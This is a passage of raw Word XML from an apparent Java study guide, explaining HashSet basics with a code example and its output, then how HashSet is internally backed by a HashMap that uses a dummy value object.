          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE1ACE"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e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Cherry"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785747D2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476B2E36"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ry adding a duplicate element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D8AF3F"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isAdde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e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ppl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his will return false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7F7BB"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pple added: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sAdded</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56776D84"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB13DB7"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heck if an element exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30996A60"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Contains 'Banana':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ntains</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Banana"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0892B700"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F833178"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Remove an element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670DCAD1"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e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remov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Banana"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172AA871"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8CBBD5"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int all elements (order is not guaranteed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640ED0D7"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Elements in se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et</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EA89D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B476713"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heck the size of the HashSet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4A2E26"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ize of se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ize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D95761"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9C31D"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heck if the HashSet is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBEDCB8"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Is set empty?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Empty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E265D9F" w14:textId="77777777"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757CCDF" w14:textId="159229EB" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95"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17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA2012" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2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p w14:paraId="08F4FD08" w14:textId="77777777" w:rsidR="001D43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="001D43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3365895"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Apple</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> adde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p>
    <w:p w14:paraId="399BDF31" w14:textId="77777777" w:rsidR="001D43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="001D43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3365895"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Contain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Banan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ue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCE38FD" w14:textId="77777777" w:rsidR="001D43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="001D43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3365895"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Element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her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ppl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he order is not guaranteed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216D01C0" w14:textId="77777777" w:rsidR="001D43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="001D43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3365895"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Siz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o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p>
    <w:p w14:paraId="1CCA8E91" w14:textId="4C5C38CB" w:rsidR="001D43FA" w:rsidRPr="00CE4B95" w:rsidRDefault="001D43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3365895"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>I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et</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> empt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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F307CAC" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2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mportant Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422B977E" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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Duplicates:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Even though we tried adding "Apple" twice, the second attempt didn't change the set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5FA1C7" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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nordered Collection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The output doesn't guarantee the order of elements in the set. It can vary each time the program is run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE236F" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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fficient Operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Operations like add(), remove(), and contains() are efficient because they are backed by a hash table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173258DB" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2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ternals of HashSet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01878308" w14:textId="77777777" w:rsidR="00D44F2B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F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nally, a HashSet uses a HashMap to store its elements. The elements themselves are used as keys in the map, and all values are just dummy values (commonly Boolean.TRUE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BA8998" w14:textId="0AF3157F" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00D44F2B" w:rsidP="00D44F2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hash codes of the elements determine their positions in the hash table, which is why the hashCode() method of the objects stored in a HashSet must be implemented properly to ensure efficient retrieval and storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C5A37" w14:textId="74865A9D" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="3EB9D6C1">
          <v:rect id="_x0000_i1581" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="656DC8D8" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Toc196307669"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which data structure used by HashSet?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w14:paraId="1638A880" w14:textId="6A25146D" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB">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ashSet in Java is internally backed by a </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A4E782" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5211C2" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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you add an element to a HashSet, it is actually stored as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the internal HashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A802DC6" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> associated with each key is a constant dummy object — typically PRESENT = new Object().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4268C6CB" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003977D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9D87075">
          <v:rect id="_x0000_i1582" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="493E3C90" w14:textId="32422C00" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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Internal Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E989807" w14:textId="77777777" w:rsidR="00022ECC" w:rsidRPr="00CE4B95" w:rsidRDefault="00022E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915431"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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ansie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Object</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map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C8BF71" w14:textId="7FAEE39B" w:rsidR="00022ECC" w:rsidRPr="00CE4B95" w:rsidRDefault="00022E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915431"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRESE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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B79A835" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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en you do:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF6BE9" w14:textId="77777777" w:rsidR="00A02755" w:rsidRPr="00CE4B95" w:rsidRDefault="00A027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144242"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HashSe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e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Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22066F3D" w14:textId="622D2A69" w:rsidR="00A02755" w:rsidRPr="00CE4B95" w:rsidRDefault="00A027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144242"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>se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pple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3210351D" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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nder the hood, it works like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B8E35" w14:textId="6B164C40" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="00BE23C3" w:rsidP="00BE23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20149"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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ppl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RESENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B63A3" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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y HashMap?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA62FF" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ashMap uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to store and retrieve keys efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB490FF" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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is allows HashSet to provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>average O(1) time complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for operations like add(), remove(), and contains().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760BD5FC" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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4"/>
        <w:gridCol w:w="996"/>
        <w:gridCol w:w="3873"/>
      </w:tblGrid>
      <w:tr w:rsidR="003977DB" w:rsidRPr="00CE4B95" w14:paraId="469C1C2A" w14:textId="77777777" w:rsidTr="003977DB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1D1AC9" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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5A995CC5" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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Backed By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4888E3E8" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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orage Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003977DB" w:rsidRPr="00CE4B95" w14:paraId="1CB2FA91" w14:textId="77777777" w:rsidTr="003977DB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DF14BC6" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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hSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CF4E6EF" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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hMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A4C5057" w14:textId="77777777" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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lements as keys, dummy Object as values</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FA8FD74" w14:textId="3EF60B10" w:rsidR="003977DB" w:rsidRPr="00CE4B95" w:rsidRDefault="003977DB" w:rsidP="003977D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o, HashSet is essentially a wrapper around HashMap that stores only the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ignoring the values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45581CB2" w14:textId="34798BC2" w:rsidR="00F764B3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00F764B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>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14F2634">
          <v:rect id="_x0000_i1583" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A84808" w14:textId="77777777" w:rsidR="001D5028" w:rsidRPr="00CE4B95" w:rsidRDefault="001D5028">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
